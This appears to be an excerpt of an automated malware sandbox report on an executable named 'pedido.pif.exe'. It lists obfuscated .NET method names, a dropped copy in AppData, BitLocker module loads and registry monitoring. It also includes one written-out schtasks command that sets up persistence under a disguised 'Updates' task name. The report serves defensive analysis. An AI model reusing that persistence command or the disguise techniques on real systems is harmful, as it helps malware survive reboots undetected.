Source: 0.2.pedido.pif.exe.4c20eb0.3.raw.unpack, q2lAhFuU6UQT8Q8l4a.cs	High entropy of concatenated method names: 'VoaxIUyxbc', 'gPYx00vHnh', 'S01xmaFIuX', 'FlIxB2XNcj', 'mcQx52hRsX', 'OIcxeXPIkg', 'YAVxAUSEVR', 'GPkxKkO23c', 'AFhxO21Gea', 'B1mxPJkv9m'
Source: 0.2.pedido.pif.exe.4c20eb0.3.raw.unpack, eqTLaKq5HbO5sCk6BR.cs	High entropy of concatenated method names: 'Dispose', 'ps2dTQL0YR', 'yNKyUIVy5m', 'VJbkkDLEy7', 'Vnqdr0Q2s6', 'n4MdzOhRsm', 'ProcessDialogKey', 'a7lyhLcxDT', 'VXOydQvGxf', 'Ea1yy7mhJG'
Source: 0.2.pedido.pif.exe.4c20eb0.3.raw.unpack, vvHIQoBLPa3JOJJtat.cs	High entropy of concatenated method names: 'xoMRg8D6kV', 'bDfRxCJx9Q', 'pZeRaYWwJv', 'tSSarNv5Tk', 'Y9pazjFJOe', 'qpORhiSdPV', 'GgmRdfvNkf', 'FZJRyf0fg6', 'dBlRZdynSr', 'HGJRNQyJ2w'
Source: 0.2.pedido.pif.exe.4c20eb0.3.raw.unpack, XoH4EamEFPmGpLFCooL.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'MVAP10gYdY', 's5MP8hDw9j', 'HnRPiWodYK', 'ytZP3IYMaN', 'K9KPq2we0H', 'PgrPQmcHqW', 'qUbPY1oDi6'
Source: 0.2.pedido.pif.exe.4c20eb0.3.raw.unpack, GgavLlcAI15g8DxanL.cs	High entropy of concatenated method names: 'irwKgIsyKL', 'CAnKfQiNSE', 'fcfKxVUbuV', 'YycKWEYVA0', 'U0pKaocij4', 'aLxKRJD6mD', 'k1EKLutv8V', 'qZZKJQe2xR', 'pEJKV9NTk8', 'DPiKbqqVfG'
Source: 0.2.pedido.pif.exe.4c20eb0.3.raw.unpack, iV5iJSxTY8sWXXCO3f.cs	High entropy of concatenated method names: 'S3aRsdHpCo', 'XcyRjc2c6R', 'e9iRcdkAYS', 'S0JRIATUKN', 'vJmRS7Zvyc', 'cH5R0Uq1hH', 'nPsRubnTUJ', 'WmsRmN45yD', 'PB5RB0sHJD', 'GZoRXOhi6F'
Source: 0.2.pedido.pif.exe.4c20eb0.3.raw.unpack, JhHOt8DnGrQuLJ8n9u.cs	High entropy of concatenated method names: 'R2nHmnUBJL', 'GCDHB6ZCxI', 'c7JHvmJ771', 'zHFHUvB6T3', 'TrKHFT374m', 'X3OHDJ3aVk', 'I23H7993J6', 'sLsHGxXaRM', 'b4oH2fM5Z1', 'UQnH9258SH'
Source: 0.2.pedido.pif.exe.4c20eb0.3.raw.unpack, BImm2IoOKhF5JhaDgH.cs	High entropy of concatenated method names: 'ToString', 'hIke9JXI7n', 's9JeUhmjqJ', 'WRhewuyJcs', 'RVEeFIkeaK', 's6ReDNYH8L', 'qrWe6Z8BDY', 'v5Ze7ZNk4b', 'DmMeGpyMVl', 'loNeo0bvT2'
Source: 0.2.pedido.pif.exe.4c20eb0.3.raw.unpack, zTAyvnwkcV8ErcT59j.cs	High entropy of concatenated method names: 'wVdaExBaFS', 'XqLafeOwST', 'OK2aW27eWE', 'okQaRCuKcq', 'uSpaL8xKwq', 'NbmWqGOSnk', 'g9UWQqPDWm', 'o0pWYVThJL', 'aB1Wn5MueQ', 'yfrWTEmGQY'
Source: 0.2.pedido.pif.exe.4c20eb0.3.raw.unpack, lDk7ZeyVj4TwGCniAX.cs	High entropy of concatenated method names: 'I0TAVvOcRl', 'uGeAbgmvOp', 'ToString', 'GdoAgkfacN', 'LCRAf6Jl4K', 'i5UAxUHvMH', 'tElAWmaWeV', 'PZXAaBfLeD', 'UoDARXUSPt', 'ftoALuvAK6'
Source: 0.2.pedido.pif.exe.4c20eb0.3.raw.unpack, SR4cgeMQHouYZ3AdeL.cs	High entropy of concatenated method names: 'LNFOdmkDn1', 'w6eOZlDG7r', 'OLSON4t6Ke', 'n7qOgxx6S1', 'SanOfKXPLe', 'IE6OWOcHn5', 'TPvOa6JkQX', 'R8fKYTjLyR', 'TjiKn62pRV', 'hatKT4xYAB'
Source: 0.2.pedido.pif.exe.4c20eb0.3.raw.unpack, hSo7DU79QtQa4qbSOT.cs	High entropy of concatenated method names: 'kS4ZEUIl0c', 'V6tZgaA6st', 'CvEZftDEHk', 'IPEZxvQCEv', 'NphZWauWu0', 'e2cZa99brN', 'rWnZRlC7Qd', 'y7jZLo4uY3', 'qWMZJXOOEy', 'RgdZV4jqGi'
Source: 0.2.pedido.pif.exe.4c20eb0.3.raw.unpack, u3kahR25akmCeVZvVN.cs	High entropy of concatenated method names: 'iXbWSITCll', 'SW3WuaPOXg', 'xFpxwVtgGW', 'R5ExF46BkY', 'XguxD7jh1h', 'CMUx65Xg5g', 'nj3x7b4IEy', 'mDqxGOL6Jq', 'bqWxoRB62q', 'hAFx2A5w39'
Source: 0.2.pedido.pif.exe.4c20eb0.3.raw.unpack, cmhDflYdAI3Km3wrTO.cs	High entropy of concatenated method names: 'vPL52MANmh', 'mUr54KPx9V', 'O5L51xH4Wj', 'BXl58NJwl9', 'h7x5UGcfGZ', 'FAo5wO4wGB', 'tEh5Ffj283', 'CLt5DK9iKM', 'aJu56FqPuA', 'soA579YUsb'
Source: 0.2.pedido.pif.exe.4bbe890.0.raw.unpack, PqX2Agmn9gUlCawFw9v.cs	High entropy of concatenated method names: 'gyKOsU4wx9', 'oC0OjtueeQ', 'XcPOc5tZQa', 'eUMOIriOXW', 'UkYOSrleaa', 'oKVO0pdWHd', 'Cx9OuFgYO8', 'j8nOm4FCyQ', 'xqdOBIk4RC', 'roxOX1BTgD'
Source: 0.2.pedido.pif.exe.4bbe890.0.raw.unpack, HnYtyupvN2d2d2Y4iF.cs	High entropy of concatenated method names: 'ahTAnKYn4N', 'KmYArVoL0a', 'Q7aKhOgAQx', 'aewKdFcxji', 's3LA983WbX', 'lKaA4rcLII', 'i09ACLEeG4', 'rHlA1jnVgJ', 'qSvA83BapU', 't6GAin8c1e'
Source: 0.2.pedido.pif.exe.4bbe890.0.raw.unpack, AlLU2bKMQbLPhlGcET.cs	High entropy of concatenated method names: 'AMGdRKouxg', 'd8VdLqCrSb', 'MmGdVIkdkf', 'dDtdbd7QNF', 'DiEd5AaoFU', 'UhKde4jyR8', 'qQb5gFGRudCgJF23bA', 'mOUhLEXyqtEhkePN82', 'vXEdd44qJt', 'd1tdZ3Z3wt'
Source: 0.2.pedido.pif.exe.4bbe890.0.raw.unpack, tfOxUKvFmSik47EEqD.cs	High entropy of concatenated method names: 's0p8r4B0hkKjjZ7wu00', 'Ux8PcrBlSbiHAJwmeDn', 'owfaKcbC7Q', 'zKuaO9FeCH', 'dW7aPDQOoF', 'VgpwLXBrDvQKT7D76Ih', 'BfJRffBeEY8Agy8exbL', 'rgIIUBBvPfC2ZuOggj6'
Source: 0.2.pedido.pif.exe.4bbe890.0.raw.unpack, QKGhpmaUoiIi9veP2o.cs	High entropy of concatenated method names: 'fyfciYgmb', 'LZIIR624Q', 'yxL0ywixo', 'm5LuCDsY8', 'HgoBjhxNJ', 'gHdXD6brw', 'er89PkgjPSm8OaHogc', 'cB2uTbYKRH2tsvUxML', 'i6FK86h4W', 'Y8SP2a5ok'
Source: 0.2.pedido.pif.exe.4bbe890.0.raw.unpack, uq9onE888d5vdViJND.cs	High entropy of concatenated method names: 'RWHKvrKAsu', 'A5MKUXhw0E', 'uDxKwCAYSq', 'd5WKF9EFk3', 'mpcK1YbtC7', 'MtHKDKKc92', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.pedido.pif.exe.4bbe890.0.raw.unpack, CA2ZJYPBsHqYB82ThB.cs	High entropy of concatenated method names: 'g92f1d5Zl2', 'a1Ff8pQghh', 'HIyfisgp3V', 'dWQf3WwXgd', 'EXffqRpBET', 'V2GfQWg2jI', 'XbgfYZfYPv', 'oDefnN9kxS', 'WyHfTrcXk5', 'jYJfruCtxo'
Source: 0.2.pedido.pif.exe.4bbe890.0.raw.unpack, q2lAhFuU6UQT8Q8l4a.cs	High entropy of concatenated method names: 'VoaxIUyxbc', 'gPYx00vHnh', 'S01xmaFIuX', 'FlIxB2XNcj', 'mcQx52hRsX', 'OIcxeXPIkg', 'YAVxAUSEVR', 'GPkxKkO23c', 'AFhxO21Gea', 'B1mxPJkv9m'
Source: 0.2.pedido.pif.exe.4bbe890.0.raw.unpack, eqTLaKq5HbO5sCk6BR.cs	High entropy of concatenated method names: 'Dispose', 'ps2dTQL0YR', 'yNKyUIVy5m', 'VJbkkDLEy7', 'Vnqdr0Q2s6', 'n4MdzOhRsm', 'ProcessDialogKey', 'a7lyhLcxDT', 'VXOydQvGxf', 'Ea1yy7mhJG'
Source: 0.2.pedido.pif.exe.4bbe890.0.raw.unpack, vvHIQoBLPa3JOJJtat.cs	High entropy of concatenated method names: 'xoMRg8D6kV', 'bDfRxCJx9Q', 'pZeRaYWwJv', 'tSSarNv5Tk', 'Y9pazjFJOe', 'qpORhiSdPV', 'GgmRdfvNkf', 'FZJRyf0fg6', 'dBlRZdynSr', 'HGJRNQyJ2w'
Source: 0.2.pedido.pif.exe.4bbe890.0.raw.unpack, XoH4EamEFPmGpLFCooL.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'MVAP10gYdY', 's5MP8hDw9j', 'HnRPiWodYK', 'ytZP3IYMaN', 'K9KPq2we0H', 'PgrPQmcHqW', 'qUbPY1oDi6'
Source: 0.2.pedido.pif.exe.4bbe890.0.raw.unpack, GgavLlcAI15g8DxanL.cs	High entropy of concatenated method names: 'irwKgIsyKL', 'CAnKfQiNSE', 'fcfKxVUbuV', 'YycKWEYVA0', 'U0pKaocij4', 'aLxKRJD6mD', 'k1EKLutv8V', 'qZZKJQe2xR', 'pEJKV9NTk8', 'DPiKbqqVfG'
Source: 0.2.pedido.pif.exe.4bbe890.0.raw.unpack, iV5iJSxTY8sWXXCO3f.cs	High entropy of concatenated method names: 'S3aRsdHpCo', 'XcyRjc2c6R', 'e9iRcdkAYS', 'S0JRIATUKN', 'vJmRS7Zvyc', 'cH5R0Uq1hH', 'nPsRubnTUJ', 'WmsRmN45yD', 'PB5RB0sHJD', 'GZoRXOhi6F'
Source: 0.2.pedido.pif.exe.4bbe890.0.raw.unpack, JhHOt8DnGrQuLJ8n9u.cs	High entropy of concatenated method names: 'R2nHmnUBJL', 'GCDHB6ZCxI', 'c7JHvmJ771', 'zHFHUvB6T3', 'TrKHFT374m', 'X3OHDJ3aVk', 'I23H7993J6', 'sLsHGxXaRM', 'b4oH2fM5Z1', 'UQnH9258SH'
Source: 0.2.pedido.pif.exe.4bbe890.0.raw.unpack, BImm2IoOKhF5JhaDgH.cs	High entropy of concatenated method names: 'ToString', 'hIke9JXI7n', 's9JeUhmjqJ', 'WRhewuyJcs', 'RVEeFIkeaK', 's6ReDNYH8L', 'qrWe6Z8BDY', 'v5Ze7ZNk4b', 'DmMeGpyMVl', 'loNeo0bvT2'
Source: 0.2.pedido.pif.exe.4bbe890.0.raw.unpack, zTAyvnwkcV8ErcT59j.cs	High entropy of concatenated method names: 'wVdaExBaFS', 'XqLafeOwST', 'OK2aW27eWE', 'okQaRCuKcq', 'uSpaL8xKwq', 'NbmWqGOSnk', 'g9UWQqPDWm', 'o0pWYVThJL', 'aB1Wn5MueQ', 'yfrWTEmGQY'
Source: 0.2.pedido.pif.exe.4bbe890.0.raw.unpack, lDk7ZeyVj4TwGCniAX.cs	High entropy of concatenated method names: 'I0TAVvOcRl', 'uGeAbgmvOp', 'ToString', 'GdoAgkfacN', 'LCRAf6Jl4K', 'i5UAxUHvMH', 'tElAWmaWeV', 'PZXAaBfLeD', 'UoDARXUSPt', 'ftoALuvAK6'
Source: 0.2.pedido.pif.exe.4bbe890.0.raw.unpack, SR4cgeMQHouYZ3AdeL.cs	High entropy of concatenated method names: 'LNFOdmkDn1', 'w6eOZlDG7r', 'OLSON4t6Ke', 'n7qOgxx6S1', 'SanOfKXPLe', 'IE6OWOcHn5', 'TPvOa6JkQX', 'R8fKYTjLyR', 'TjiKn62pRV', 'hatKT4xYAB'
Source: 0.2.pedido.pif.exe.4bbe890.0.raw.unpack, hSo7DU79QtQa4qbSOT.cs	High entropy of concatenated method names: 'kS4ZEUIl0c', 'V6tZgaA6st', 'CvEZftDEHk', 'IPEZxvQCEv', 'NphZWauWu0', 'e2cZa99brN', 'rWnZRlC7Qd', 'y7jZLo4uY3', 'qWMZJXOOEy', 'RgdZV4jqGi'
Source: 0.2.pedido.pif.exe.4bbe890.0.raw.unpack, u3kahR25akmCeVZvVN.cs	High entropy of concatenated method names: 'iXbWSITCll', 'SW3WuaPOXg', 'xFpxwVtgGW', 'R5ExF46BkY', 'XguxD7jh1h', 'CMUx65Xg5g', 'nj3x7b4IEy', 'mDqxGOL6Jq', 'bqWxoRB62q', 'hAFx2A5w39'
Source: 0.2.pedido.pif.exe.4bbe890.0.raw.unpack, cmhDflYdAI3Km3wrTO.cs	High entropy of concatenated method names: 'vPL52MANmh', 'mUr54KPx9V', 'O5L51xH4Wj', 'BXl58NJwl9', 'h7x5UGcfGZ', 'FAo5wO4wGB', 'tEh5Ffj283', 'CLt5DK9iKM', 'aJu56FqPuA', 'soA579YUsb'
Source: 9.2.RePUtenbQjvc.exe.442f800.3.raw.unpack, PqX2Agmn9gUlCawFw9v.cs	High entropy of concatenated method names: 'gyKOsU4wx9', 'oC0OjtueeQ', 'XcPOc5tZQa', 'eUMOIriOXW', 'UkYOSrleaa', 'oKVO0pdWHd', 'Cx9OuFgYO8', 'j8nOm4FCyQ', 'xqdOBIk4RC', 'roxOX1BTgD'
Source: 9.2.RePUtenbQjvc.exe.442f800.3.raw.unpack, HnYtyupvN2d2d2Y4iF.cs	High entropy of concatenated method names: 'ahTAnKYn4N', 'KmYArVoL0a', 'Q7aKhOgAQx', 'aewKdFcxji', 's3LA983WbX', 'lKaA4rcLII', 'i09ACLEeG4', 'rHlA1jnVgJ', 'qSvA83BapU', 't6GAin8c1e'
Source: 9.2.RePUtenbQjvc.exe.442f800.3.raw.unpack, AlLU2bKMQbLPhlGcET.cs	High entropy of concatenated method names: 'AMGdRKouxg', 'd8VdLqCrSb', 'MmGdVIkdkf', 'dDtdbd7QNF', 'DiEd5AaoFU', 'UhKde4jyR8', 'qQb5gFGRudCgJF23bA', 'mOUhLEXyqtEhkePN82', 'vXEdd44qJt', 'd1tdZ3Z3wt'
Source: 9.2.RePUtenbQjvc.exe.442f800.3.raw.unpack, tfOxUKvFmSik47EEqD.cs	High entropy of concatenated method names: 's0p8r4B0hkKjjZ7wu00', 'Ux8PcrBlSbiHAJwmeDn', 'owfaKcbC7Q', 'zKuaO9FeCH', 'dW7aPDQOoF', 'VgpwLXBrDvQKT7D76Ih', 'BfJRffBeEY8Agy8exbL', 'rgIIUBBvPfC2ZuOggj6'
Source: 9.2.RePUtenbQjvc.exe.442f800.3.raw.unpack, QKGhpmaUoiIi9veP2o.cs	High entropy of concatenated method names: 'fyfciYgmb', 'LZIIR624Q', 'yxL0ywixo', 'm5LuCDsY8', 'HgoBjhxNJ', 'gHdXD6brw', 'er89PkgjPSm8OaHogc', 'cB2uTbYKRH2tsvUxML', 'i6FK86h4W', 'Y8SP2a5ok'
Source: 9.2.RePUtenbQjvc.exe.442f800.3.raw.unpack, uq9onE888d5vdViJND.cs	High entropy of concatenated method names: 'RWHKvrKAsu', 'A5MKUXhw0E', 'uDxKwCAYSq', 'd5WKF9EFk3', 'mpcK1YbtC7', 'MtHKDKKc92', 'Next', 'Next', 'Next', 'NextBytes'
Source: 9.2.RePUtenbQjvc.exe.442f800.3.raw.unpack, CA2ZJYPBsHqYB82ThB.cs	High entropy of concatenated method names: 'g92f1d5Zl2', 'a1Ff8pQghh', 'HIyfisgp3V', 'dWQf3WwXgd', 'EXffqRpBET', 'V2GfQWg2jI', 'XbgfYZfYPv', 'oDefnN9kxS', 'WyHfTrcXk5', 'jYJfruCtxo'
Source: 9.2.RePUtenbQjvc.exe.442f800.3.raw.unpack, q2lAhFuU6UQT8Q8l4a.cs	High entropy of concatenated method names: 'VoaxIUyxbc', 'gPYx00vHnh', 'S01xmaFIuX', 'FlIxB2XNcj', 'mcQx52hRsX', 'OIcxeXPIkg', 'YAVxAUSEVR', 'GPkxKkO23c', 'AFhxO21Gea', 'B1mxPJkv9m'
Source: 9.2.RePUtenbQjvc.exe.442f800.3.raw.unpack, eqTLaKq5HbO5sCk6BR.cs	High entropy of concatenated method names: 'Dispose', 'ps2dTQL0YR', 'yNKyUIVy5m', 'VJbkkDLEy7', 'Vnqdr0Q2s6', 'n4MdzOhRsm', 'ProcessDialogKey', 'a7lyhLcxDT', 'VXOydQvGxf', 'Ea1yy7mhJG'
Source: 9.2.RePUtenbQjvc.exe.442f800.3.raw.unpack, vvHIQoBLPa3JOJJtat.cs	High entropy of concatenated method names: 'xoMRg8D6kV', 'bDfRxCJx9Q', 'pZeRaYWwJv', 'tSSarNv5Tk', 'Y9pazjFJOe', 'qpORhiSdPV', 'GgmRdfvNkf', 'FZJRyf0fg6', 'dBlRZdynSr', 'HGJRNQyJ2w'
Source: 9.2.RePUtenbQjvc.exe.442f800.3.raw.unpack, XoH4EamEFPmGpLFCooL.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'MVAP10gYdY', 's5MP8hDw9j', 'HnRPiWodYK', 'ytZP3IYMaN', 'K9KPq2we0H', 'PgrPQmcHqW', 'qUbPY1oDi6'
Source: 9.2.RePUtenbQjvc.exe.442f800.3.raw.unpack, GgavLlcAI15g8DxanL.cs	High entropy of concatenated method names: 'irwKgIsyKL', 'CAnKfQiNSE', 'fcfKxVUbuV', 'YycKWEYVA0', 'U0pKaocij4', 'aLxKRJD6mD', 'k1EKLutv8V', 'qZZKJQe2xR', 'pEJKV9NTk8', 'DPiKbqqVfG'
Source: 9.2.RePUtenbQjvc.exe.442f800.3.raw.unpack, iV5iJSxTY8sWXXCO3f.cs	High entropy of concatenated method names: 'S3aRsdHpCo', 'XcyRjc2c6R', 'e9iRcdkAYS', 'S0JRIATUKN', 'vJmRS7Zvyc', 'cH5R0Uq1hH', 'nPsRubnTUJ', 'WmsRmN45yD', 'PB5RB0sHJD', 'GZoRXOhi6F'
Source: 9.2.RePUtenbQjvc.exe.442f800.3.raw.unpack, JhHOt8DnGrQuLJ8n9u.cs	High entropy of concatenated method names: 'R2nHmnUBJL', 'GCDHB6ZCxI', 'c7JHvmJ771', 'zHFHUvB6T3', 'TrKHFT374m', 'X3OHDJ3aVk', 'I23H7993J6', 'sLsHGxXaRM', 'b4oH2fM5Z1', 'UQnH9258SH'
Source: 9.2.RePUtenbQjvc.exe.442f800.3.raw.unpack, BImm2IoOKhF5JhaDgH.cs	High entropy of concatenated method names: 'ToString', 'hIke9JXI7n', 's9JeUhmjqJ', 'WRhewuyJcs', 'RVEeFIkeaK', 's6ReDNYH8L', 'qrWe6Z8BDY', 'v5Ze7ZNk4b', 'DmMeGpyMVl', 'loNeo0bvT2'
Source: 9.2.RePUtenbQjvc.exe.442f800.3.raw.unpack, zTAyvnwkcV8ErcT59j.cs	High entropy of concatenated method names: 'wVdaExBaFS', 'XqLafeOwST', 'OK2aW27eWE', 'okQaRCuKcq', 'uSpaL8xKwq', 'NbmWqGOSnk', 'g9UWQqPDWm', 'o0pWYVThJL', 'aB1Wn5MueQ', 'yfrWTEmGQY'
Source: 9.2.RePUtenbQjvc.exe.442f800.3.raw.unpack, lDk7ZeyVj4TwGCniAX.cs	High entropy of concatenated method names: 'I0TAVvOcRl', 'uGeAbgmvOp', 'ToString', 'GdoAgkfacN', 'LCRAf6Jl4K', 'i5UAxUHvMH', 'tElAWmaWeV', 'PZXAaBfLeD', 'UoDARXUSPt', 'ftoALuvAK6'
Source: 9.2.RePUtenbQjvc.exe.442f800.3.raw.unpack, SR4cgeMQHouYZ3AdeL.cs	High entropy of concatenated method names: 'LNFOdmkDn1', 'w6eOZlDG7r', 'OLSON4t6Ke', 'n7qOgxx6S1', 'SanOfKXPLe', 'IE6OWOcHn5', 'TPvOa6JkQX', 'R8fKYTjLyR', 'TjiKn62pRV', 'hatKT4xYAB'
Source: 9.2.RePUtenbQjvc.exe.442f800.3.raw.unpack, hSo7DU79QtQa4qbSOT.cs	High entropy of concatenated method names: 'kS4ZEUIl0c', 'V6tZgaA6st', 'CvEZftDEHk', 'IPEZxvQCEv', 'NphZWauWu0', 'e2cZa99brN', 'rWnZRlC7Qd', 'y7jZLo4uY3', 'qWMZJXOOEy', 'RgdZV4jqGi'
Source: 9.2.RePUtenbQjvc.exe.442f800.3.raw.unpack, u3kahR25akmCeVZvVN.cs	High entropy of concatenated method names: 'iXbWSITCll', 'SW3WuaPOXg', 'xFpxwVtgGW', 'R5ExF46BkY', 'XguxD7jh1h', 'CMUx65Xg5g', 'nj3x7b4IEy', 'mDqxGOL6Jq', 'bqWxoRB62q', 'hAFx2A5w39'
Source: 9.2.RePUtenbQjvc.exe.442f800.3.raw.unpack, cmhDflYdAI3Km3wrTO.cs	High entropy of concatenated method names: 'vPL52MANmh', 'mUr54KPx9V', 'O5L51xH4Wj', 'BXl58NJwl9', 'h7x5UGcfGZ', 'FAo5wO4wGB', 'tEh5Ffj283', 'CLt5DK9iKM', 'aJu56FqPuA', 'soA579YUsb'

Source: C:\Users\user\Desktop\pedido.pif.exe

File created: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\pedido.pif.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\RePUtenbQjvc" /XML "C:\Users\user\AppData\Local\Temp\tmp30EC.tmp"

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\pedido.pif.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate	Jump to behavior
Source: C:\Users\user\AppData\Roaming\RePUtenbQjvc.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot	Jump to behavior

Source: C:\Users\user\Desktop\pedido.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\pedido.pif.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
